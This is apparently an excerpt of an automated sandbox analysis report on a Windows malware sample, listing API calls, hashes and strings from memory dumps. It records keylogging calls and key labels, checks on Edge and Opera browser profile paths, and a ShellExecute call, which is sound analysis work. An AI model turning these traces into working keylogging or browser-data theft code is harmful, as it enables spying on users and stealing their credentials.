                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: 911eca338311f85069e2af4ccc8ed928932e81e1ee07fccbbe9b002445cdb3b1
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: 911eca338311f85069e2af4ccc8ed928932e81e1ee07fccbbe9b002445cdb3b1
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 25af406674ba748cf22b69dac7a276e1c55e1f7e049a59cb8dfb70449f372998
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: 25af406674ba748cf22b69dac7a276e1c55e1f7e049a59cb8dfb70449f372998
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                  • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                                  • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                                • DeleteCriticalSection.KERNEL32(006B3DC0), ref: 0043C1F1
                                • _free.LIBCMT ref: 0043C205
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$CriticalDeleteSection
                                • String ID: =k
                                • API String ID: 1906768660-1421436146
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectProcessSingleTerminateWait
                                • String ID: pth_unenc
                                • API String ID: 1872346434-4028850238
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                Uniqueness

                                Uniqueness Score: -1.00%